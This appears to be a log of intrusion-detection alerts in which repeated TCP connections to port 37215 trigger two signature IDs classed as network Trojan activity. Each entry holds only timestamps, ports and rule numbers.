                Timestamp:05/29/24-15:15:57.960553
                SID:2829579
                Source Port:45116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559273
                SID:2829579
                Source Port:44952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782450
                SID:2829579
                Source Port:39656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435757
                SID:2829579
                Source Port:46400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008669
                SID:2835222
                Source Port:58798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013620
                SID:2829579
                Source Port:51058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899181
                SID:2829579
                Source Port:42250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.806317
                SID:2835222
                Source Port:36614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.978013
                SID:2835222
                Source Port:41270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573865
                SID:2829579
                Source Port:46414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839019
                SID:2835222
                Source Port:36480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663494
                SID:2835222
                Source Port:37952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502551
                SID:2835222
                Source Port:53836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618622
                SID:2835222
                Source Port:33060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210806
                SID:2835222
                Source Port:33678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573967
                SID:2829579
                Source Port:33368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518425
                SID:2829579
                Source Port:60406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071524
                SID:2835222
                Source Port:53938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816632
                SID:2829579
                Source Port:58314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896276
                SID:2829579
                Source Port:34728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560141
                SID:2829579
                Source Port:53016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874968
                SID:2829579
                Source Port:41614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522744
                SID:2829579
                Source Port:50658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014302
                SID:2835222
                Source Port:54662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465994
                SID:2835222
                Source Port:48748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560179
                SID:2829579
                Source Port:36038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265006
                SID:2829579
                Source Port:40964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282036
                SID:2835222
                Source Port:38694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271398
                SID:2829579
                Source Port:33346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261459
                SID:2829579
                Source Port:57036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788313
                SID:2829579
                Source Port:38590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173074
                SID:2829579
                Source Port:44850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073614
                SID:2835222
                Source Port:44940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652509
                SID:2835222
                Source Port:46840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816013
                SID:2829579
                Source Port:57366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944799
                SID:2835222
                Source Port:48988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842356
                SID:2829579
                Source Port:41276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744580
                SID:2829579
                Source Port:37606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947357
                SID:2835222
                Source Port:41910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947766
                SID:2835222
                Source Port:44710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979454
                SID:2835222
                Source Port:57232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807406
                SID:2829579
                Source Port:60844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233864
                SID:2829579
                Source Port:39276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765483
                SID:2835222
                Source Port:42726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737346
                SID:2829579
                Source Port:43548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643214
                SID:2835222
                Source Port:45182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782708
                SID:2835222
                Source Port:57038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136926
                SID:2829579
                Source Port:40174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782804
                SID:2835222
                Source Port:60328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228353
                SID:2835222
                Source Port:50612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088440
                SID:2829579
                Source Port:38178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237664
                SID:2835222
                Source Port:39958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141803
                SID:2835222
                Source Port:56764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266286
                SID:2835222
                Source Port:34118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.872691
                SID:2835222
                Source Port:35696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944724
                SID:2835222
                Source Port:52546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901910
                SID:2835222
                Source Port:52864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023579
                SID:2835222
                Source Port:50240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010544
                SID:2829579
                Source Port:41824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573992
                SID:2835222
                Source Port:53160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711988
                SID:2829579
                Source Port:49328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.729970
                SID:2829579
                Source Port:45586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372380
                SID:2829579
                Source Port:51762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900400
                SID:2829579
                Source Port:38640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927988
                SID:2829579
                Source Port:59822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264563
                SID:2829579
                Source Port:34210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762955
                SID:2835222
                Source Port:36052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868326
                SID:2829579
                Source Port:57144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929614
                SID:2829579
                Source Port:42950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223795
                SID:2829579
                Source Port:49684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972646
                SID:2829579
                Source Port:59258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620733
                SID:2829579
                Source Port:52722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868769
                SID:2829579
                Source Port:34220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.326049
                SID:2835222
                Source Port:41326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228374
                SID:2829579
                Source Port:42744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267789
                SID:2835222
                Source Port:51570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222755
                SID:2829579
                Source Port:57820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026630
                SID:2829579
                Source Port:48078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032348
                SID:2829579
                Source Port:45328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269983
                SID:2829579
                Source Port:40904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429119
                SID:2829579
                Source Port:50382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947791
                SID:2829579
                Source Port:50458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505736
                SID:2835222
                Source Port:56002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583777
                SID:2835222
                Source Port:50124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207290
                SID:2829579
                Source Port:59000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160626
                SID:2829579
                Source Port:52388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664472
                SID:2829579
                Source Port:35264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325896
                SID:2829579
                Source Port:49996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.045043
                SID:2835222
                Source Port:51886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626647
                SID:2835222
                Source Port:41726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788455
                SID:2835222
                Source Port:45758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904842
                SID:2835222
                Source Port:40246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321155
                SID:2829579
                Source Port:47458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073582
                SID:2829579
                Source Port:41194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074081
                SID:2835222
                Source Port:42686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160402
                SID:2829579
                Source Port:56314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281178
                SID:2835222
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039655
                SID:2829579
                Source Port:44040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659955
                SID:2829579
                Source Port:43270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662058
                SID:2829579
                Source Port:38358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840796
                SID:2835222
                Source Port:54784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212222
                SID:2829579
                Source Port:42382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286635
                SID:2835222
                Source Port:56920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361645
                SID:2829579
                Source Port:42222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.159791
                SID:2835222
                Source Port:51292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264311
                SID:2835222
                Source Port:52768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.580925
                SID:2829579
                Source Port:56574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041981
                SID:2829579
                Source Port:36452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914974
                SID:2835222
                Source Port:36628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943866
                SID:2829579
                Source Port:53146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384511
                SID:2835222
                Source Port:57746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034668
                SID:2835222
                Source Port:37138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990371
                SID:2829579
                Source Port:33160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524707
                SID:2829579
                Source Port:46092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.093178
                SID:2829579
                Source Port:42140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072340
                SID:2835222
                Source Port:56948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038246
                SID:2835222
                Source Port:50324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735194
                SID:2829579
                Source Port:54826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385494
                SID:2829579
                Source Port:36652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537659
                SID:2829579
                Source Port:55352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931681
                SID:2829579
                Source Port:36786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207974
                SID:2829579
                Source Port:56488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664534
                SID:2835222
                Source Port:36162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900477
                SID:2829579
                Source Port:45432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227490
                SID:2835222
                Source Port:47302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962883
                SID:2835222
                Source Port:42092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385416
                SID:2829579
                Source Port:46738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262192
                SID:2829579
                Source Port:55010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944945
                SID:2829579
                Source Port:60022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902155
                SID:2829579
                Source Port:52348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282466
                SID:2835222
                Source Port:56672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328465
                SID:2829579
                Source Port:53550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275456
                SID:2829579
                Source Port:52628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.689588
                SID:2835222
                Source Port:56380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969353
                SID:2829579
                Source Port:48000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501151
                SID:2829579
                Source Port:49372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262395
                SID:2829579
                Source Port:39958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563620
                SID:2835222
                Source Port:53816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.516011
                SID:2829579
                Source Port:44490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023899
                SID:2829579
                Source Port:37674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280522
                SID:2829579
                Source Port:47144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418819
                SID:2835222
                Source Port:54740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266616
                SID:2829579
                Source Port:45388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811772
                SID:2835222
                Source Port:44930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586826
                SID:2829579
                Source Port:56906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101024
                SID:2835222
                Source Port:33946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903529
                SID:2829579
                Source Port:54720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559670
                SID:2829579
                Source Port:51692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024536
                SID:2835222
                Source Port:48468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874601
                SID:2835222
                Source Port:59266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868617
                SID:2835222
                Source Port:56922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863084
                SID:2835222
                Source Port:44932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.617104
                SID:2829579
                Source Port:60976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734765
                SID:2835222
                Source Port:36770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869657
                SID:2829579
                Source Port:40318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947248
                SID:2835222
                Source Port:41470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.941440
                SID:2829579
                Source Port:36630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060852
                SID:2835222
                Source Port:55196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473598
                SID:2829579
                Source Port:41886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856120
                SID:2829579
                Source Port:39852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239509
                SID:2829579
                Source Port:45784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263800
                SID:2829579
                Source Port:58632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667281
                SID:2829579
                Source Port:38188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616311
                SID:2835222
                Source Port:41304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949748
                SID:2835222
                Source Port:54412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652356
                SID:2829579
                Source Port:55650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369241
                SID:2829579
                Source Port:52848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767736
                SID:2835222
                Source Port:44880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237565
                SID:2829579
                Source Port:52856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799481
                SID:2835222
                Source Port:37026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277203
                SID:2829579
                Source Port:47782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560098
                SID:2835222
                Source Port:40020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872971
                SID:2829579
                Source Port:41192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418341
                SID:2829579
                Source Port:56014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281952
                SID:2829579
                Source Port:42792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419004
                SID:2835222
                Source Port:46590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010971
                SID:2835222
                Source Port:58816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231427
                SID:2835222
                Source Port:50724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893191
                SID:2829579
                Source Port:46476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966306
                SID:2829579
                Source Port:44066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901976
                SID:2835222
                Source Port:39318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896847
                SID:2835222
                Source Port:54750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286414
                SID:2829579
                Source Port:55108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440722
                SID:2829579
                Source Port:52998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.806031
                SID:2829579
                Source Port:60940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227811
                SID:2835222
                Source Port:46928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218209
                SID:2829579
                Source Port:60314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507084
                SID:2829579
                Source Port:33168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140423
                SID:2835222
                Source Port:39824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562022
                SID:2829579
                Source Port:46904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558057
                SID:2829579
                Source Port:35430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263534
                SID:2829579
                Source Port:54170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932042
                SID:2829579
                Source Port:37116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652586
                SID:2829579
                Source Port:53132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575751
                SID:2835222
                Source Port:57002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269453
                SID:2835222
                Source Port:37690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013798
                SID:2829579
                Source Port:46178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929928
